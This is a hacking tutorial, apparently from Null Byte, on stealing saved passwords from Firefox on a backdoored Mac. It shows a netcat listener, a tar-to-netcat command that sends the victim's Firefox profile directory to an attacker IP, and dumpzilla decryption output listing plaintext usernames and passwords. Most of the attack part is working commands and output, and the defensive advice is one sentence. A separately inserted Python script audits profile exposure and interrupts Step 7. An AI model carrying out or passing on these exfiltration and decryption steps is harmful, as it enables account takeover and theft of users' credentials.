
How to Remotely Steal Passwords Stored in Firefox Browsers « Null Byte :: WonderHowTo



Passwords and data stored in web browsers are extremely valuable to hackers. Even if there is no financial gain to be had, black hat hackers may still pass your passwords and personal information around for amusement. Never underestimate what you are worth to a hacker.

While I'm definitely no black hat, it has been an interesting experience discovering fun post-exploitation methods to run from a backdoor on a MacBook. So far, I've been surprised by how easy it is to abuse tools built into macOS, or to install third-party software, to further compromise a Mac.

Continuing this macOS hacking journey, this time I'll show how hackers can easily exfiltrate sensitive Firefox directories and extract passwords from them with dumpzilla, a comprehensive browser forensics tool. While black hats could benefit from this knowledge, white hats, pentesters and other well-meaning hackers will find it useful too. Ordinary Mac users will also learn how everyday practices such as storing passwords in the browser can put them at risk.

Readers should be aware that this attack was performed from a low-privilege backdoor (no admin access) against Firefox 60 on macOS 10.13 with the firewall enabled and AVG antivirus installed.

Step 1: Install Dumpzilla Dependencies

Starting on the Kali system, install a few packages with pip. Pip is a package management system for installing and managing Python packages. These packages are required to run dumpzilla. The full command is pip install logging lz4.

  pip install logging lz4

Collecting logging
  Downloading https://files.pythonhosted.org/packages/93/4b/979db9e44be09f71e85c9c8cfc42f258adfb7d93ce01deed2788b2948919/logging-0.4.9.6.tar.gz (96kB)
    100% |████████████████████████████████| 102kB 69kB/s
Building wheels for collected packages: logging
  Running setup.py bdist_wheel for logging ... done
  Stored in directory: /root/.cache/pip/wheels/7d/2e/cb/a51fbdf351b2efebcf857f8b2c8d59b6ccd44ea2e9bb4005d6
Successfully built logging
Installing collected packages: logging
Successfully installed logging-0.4.9.6

There are a few more dependencies that I found easier to install with APT. Enter apt-get install python3 sqlite3 python-lz4 libnss3*.

  apt-get install python3 sqlite3 python-lz4 libnss3*

Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
  sqlite3-doc
The following NEW packages will be installed:
  python-lz4 sqlite3
0 upgraded, 2 newly installed, 0 to remove and 274 not upgraded.
Need to get 879 kB of archives.
After this operation, 2,591 kB of additional disk space will be used.
Get:1 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 python-lz4 amd64 0.10.1+dfsg1-0.2 [16.6 kB]
Get:2 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 sqlite3 amd64 3.23.1-1 [863 kB]
Fetched 879 kB in 15s (60.0 kB/s)
Selecting previously unselected package python-lz4.
(Reading database ... 181720 files and directories currently installed.)
Preparing to unpack .../python-lz4_0.10.1+dfsg1-0.2_amd64.deb ...
Unpacking python-lz4 (0.10.1+dfsg1-0.2) ...
Selecting previously unselected package sqlite3.
Preparing to unpack .../sqlite3_3.23.1-1_amd64.deb ...
Unpacking sqlite3 (3.23.1-1) ...
Setting up python-lz4 (0.10.1+dfsg1-0.2) ...
Setting up sqlite3 (3.23.1-1) ...
Processing triggers for man-db (2.8.3-2) ...

Step 2: Download Dumpzilla

With the necessary packages installed, it is now safe to download dumpzilla.

At the time of writing, the latest version of dumpzilla has a bug that prevents passwords stored in Firefox from being decrypted automatically. Fortunately, GitHub keeps a history of every version, which users can access at any time.

In future versions of dumpzilla, it should be possible to simply clone the repository and continue with this article. For the moment, readers should download this specific version of dumpzilla with the following wget command. This version has been tested and decrypts the passwords saved in Firefox as expected.

  wget 'https://github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip'

Step 3: Extract Dumpzilla

Wget creates a new file named b3075d1960874ce82ea76a5be9f58602afb61c39.zip. The dumpzilla files it contains can be extracted with the command unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip.

  unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip

Archive:  b3075d1960874ce82ea76a5be9f58602afb61c39.zip
b3075d1960874ce82ea76a5be9f58602afb61c39
   creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/
   creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addinfo.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addons.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/bookmarks.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cert_override.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cookies.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_dir.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_history.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/exceptions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/extensions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/forms.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/history.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/offlinecache.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/passwords.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/permissions.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/session.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/thumbnails.json
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/README.md
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla
  inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla.py

After extracting dumpzilla, change into the newly created directory "dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/" with the cd command.

  cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/

Step 4: Set the File Permissions

Then use the chmod command to make sure the dumpzilla.py file has permission to execute in Kali.

  chmod +x dumpzilla.py

Step 5: Start the Netcat Listener

With dumpzilla all set up, start a Netcat listener to receive the Firefox directories sent from the backdoored MacBook.

  nc -l -p 9999 | tar x 

This command instructs Netcat to listen on port (-p) 9999 and pipe (|) the incoming data into the tar command. Tar is a command-line archiving utility available in both Kali and macOS. The x argument tells tar to extract, so it unpacks the data (the packed directories) arriving from the Netcat pipe and writes it to disk. The directories are packed into a single tar archive for the transfer so that Netcat only has to handle one continuous stream of data.

That covers downloading dumpzilla and configuring Netcat to receive the Firefox data. Next, I'll show how to exfiltrate complete Firefox directories from the backdoored MacBook.

Step 6: Exfiltrate Directories from the Backdoored MacBook

Some readers may be aware that Firefox can manage multiple profiles. Profiles are typically used by more experienced users who want to keep their work, school and personal browsing history, bookmarks and cookies separate.

Generally, most Firefox users have a single "default" profile. macOS stores profiles in the directory below.

  /Users/<username>/Library/Application Support/Firefox/Profiles/

Note the <username> portion of the directory path. Every user on the MacBook has their own Profiles/ directory, and by default a user does not have read permission (file permissions) to view the profiles of other users.

For example, if Bob's MacBook is compromised with a fake PDF while he is logged in to his account, the attacker will not be able to see Firefox profiles on the MacBook that do not belong to Bob. At least not without a privilege escalation, which is beyond the scope of this article.

On the other hand, if the target MacBook was physically backdoored, the attacker would likely have full root (administrator) access to all accounts and Firefox profiles.

Assuming the intent is to exfiltrate only the Firefox profile of a single account, connect to the backdoored MacBook for these next commands.

Change into the directory containing Profiles/ with cd.

  cd '/Users/<username>/Library/Application Support/Firefox/'

Then use the following tar command to pack (cf) the Profiles/ directory (and all of its contents) into an archive and pipe (|) the data directly into the Netcat (nc) command. The attacker's system and IP address are represented as 1.2.3.4, so be sure to change the IP address to the VPS or local IP address used by the attacker.

  tar cf - Profiles/ | nc 1.2.3.4 9999

While Netcat is transferring the directory, the terminals will appear to have frozen or stalled. It took about two minutes for the transfer to complete when exfiltrating a Firefox profile with just 12 hours of stored data. I imagine a Firefox profile with months of browsing history, months of cookies and hundreds of bookmarks could take much longer. Be patient here. If any of the data in the directories is corrupted while being exfiltrated to the Kali system, the passwords stored in the Firefox profiles may not be decryptable.

Step 7: Decrypt the Passwords

Back on the Kali machine, there will be a new Profiles/ directory containing at least one directory that follows the naming scheme xxxxxxxx.default/. By default, Firefox generates eight random characters (xxxxxxxx) and prefixes them to the profile name. For example, users with multiple profiles might have directories named "w9wuahzu.work/", "ei49j03w.personal/" and "r3h84t9t.default/". Each directory can be processed individually with dumpzilla.
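From the defender's side, the profile layout described above is what you would inventory to understand what a compromise of a single account exposes. The following script is an added example written for this article (it is not dumpzilla code and not from the original post): it parses Firefox's profiles.ini to discover profile directories, counts the saved logins listed in each profile's logins.json and the sites they belong to, and checks whether the profile directory is readable by other local users. It reads only metadata and never attempts decryption. The sample profiles.ini and logins.json are constructed inline so the script runs offline; the placeholder ciphertexts and example hostnames are not real data, and the key4.db check reflects Firefox's NSS key store, a fact not taken from the article.

```python
"""Inventory what a Firefox profile exposes if the account owning it is compromised.

Added defensive example (not part of the original article): discovers profiles via
profiles.ini, reports saved-login counts and sites from logins.json, and checks
whether the profile directory is readable by other users. Nothing is decrypted.
"""
import configparser
import json
import os
import stat
import tempfile
from pathlib import Path

# Constructed sample data so the script runs offline. Profile directory names
# follow the "xxxxxxxx.<name>" scheme; ciphertexts are obvious placeholders.
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1

[Profile0]
Name=default
IsRelative=1
Path=Profiles/r3h84t9t.default
Default=1

[Profile1]
Name=work
IsRelative=1
Path=Profiles/w9wuahzu.work
"""

SAMPLE_LOGINS = {
    "nextId": 3,
    "logins": [
        {"id": 1, "hostname": "https://www.example.com",
         "encryptedUsername": "<placeholder>", "encryptedPassword": "<placeholder>",
         "timesUsed": 4},
        {"id": 2, "hostname": "https://accounts.example.org",
         "encryptedUsername": "<placeholder>", "encryptedPassword": "<placeholder>",
         "timesUsed": 1},
    ],
    "version": 3,
}


def list_profiles(firefox_dir):
    """Return [{'name', 'path', 'default'}] for every [ProfileN] section in profiles.ini."""
    ini = configparser.ConfigParser()
    ini.read(Path(firefox_dir) / "profiles.ini")
    profiles = []
    for section in ini.sections():
        if not section.startswith("Profile"):
            continue
        raw_path = ini[section]["Path"]
        relative = ini[section].get("IsRelative", "1") == "1"
        path = Path(firefox_dir) / raw_path if relative else Path(raw_path)
        profiles.append({
            "name": ini[section].get("Name", section),
            "path": path,
            "default": ini[section].get("Default", "0") == "1",
        })
    return profiles


def audit_profile(profile_dir):
    """Summarise the credential material present in one profile directory."""
    profile_dir = Path(profile_dir)
    logins_file = profile_dir / "logins.json"
    mode = stat.S_IMODE(os.stat(profile_dir).st_mode)
    report = {
        "profile": profile_dir.name,
        "has_logins": logins_file.exists(),
        # key4.db holds the NSS key protecting logins.json (fact, not from the article).
        "has_key_db": (profile_dir / "key4.db").exists(),
        "saved_logins": 0,
        "sites": [],
        # Group/other read bits set means other local users could copy the profile.
        "world_readable": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
    }
    if report["has_logins"]:
        entries = json.loads(logins_file.read_text()).get("logins", [])
        report["saved_logins"] = len(entries)
        report["sites"] = sorted({e["hostname"] for e in entries})
    return report


def build_sample_tree(root):
    """Create the constructed layout under <root>/Firefox and return that directory."""
    firefox_dir = Path(root) / "Firefox"
    (firefox_dir / "Profiles").mkdir(parents=True)
    (firefox_dir / "profiles.ini").write_text(SAMPLE_PROFILES_INI)
    default_dir = firefox_dir / "Profiles" / "r3h84t9t.default"
    work_dir = firefox_dir / "Profiles" / "w9wuahzu.work"
    for d in (default_dir, work_dir):
        d.mkdir(mode=0o700)  # owner-only, as macOS does for per-user profiles
    (default_dir / "logins.json").write_text(json.dumps(SAMPLE_LOGINS))
    (default_dir / "key4.db").write_bytes(b"")  # empty stand-in for the key store
    return firefox_dir


def run_demo():
    """Build the sample tree in a temp dir and return {profile name: report}."""
    with tempfile.TemporaryDirectory() as tmp:
        ff = build_sample_tree(tmp)
        return {p["name"]: audit_profile(p["path"]) for p in list_profiles(ff)}


if __name__ == "__main__":
    for name, rep in run_demo().items():
        print(name, rep)
```

To audit a real account, point list_profiles at ~/Library/Application Support/Firefox on macOS (or ~/.mozilla/firefox on Linux) instead of the constructed tree; a non-zero saved_logins count is exactly the material the tutorial above extracts, and a true world_readable flag means the profile is exposed to more than the owning account.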

To extract passwords from a specific Firefox profile, use the command python3 dumpzilla.py Profiles/xxxxxxxx.default/ --Passwords.

  python3 dumpzilla.py Profiles/xxxxxxxx.default/ --Passwords

============================================================================================
== Decode passwords
============================================================================================
=> Source file: /tmp/dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/9kwbffy3.default/logins.json
=> SHA256 hash: 9df5b2c418bbb967e63b556162e6d11ed509a9a5c67580f3c79e089d954ade91

Web: https://www.facebook.com
Username: kevin.poulsen@gmail.com
Password: DarkDante23

Web: https://accounts.google.com
Username: kevin.poulsen
Password: Porsche944

Web: https://www.reddit.com
Username: hackerone@gmail.com
Password: DarkDante23

Web: https://www.amazon.com
Username: kevin.poulsen@gmail.com
Password: DarkDante944

Web: https://login.live.com
Username: kpoulsen@live.com
Password: DarkDante123

Web: https://www.netflix.com
Username: hackerone@gmail.com
Password: Porsche944

Web: https://login.aliexpress.com
Username: Poulsen
Password: Jordan626

============================================================================================
== Total Information
============================================================================================

Total Decoded Passwords: 7
Total Passwords: 7

How to Protect Against Web Browser Attacks

Do not let this article stop you from using Firefox, or assume that Google Chrome is more secure: Chrome is just as vulnerable to the techniques described in this article. Instead of looking to the web browser for protection, make small behavioral changes that make attacks like this harder for hackers.

Don't Miss: How to Manage Your Passwords with KeePassX in macOS

Cover image by tokyoneon/Null Byte
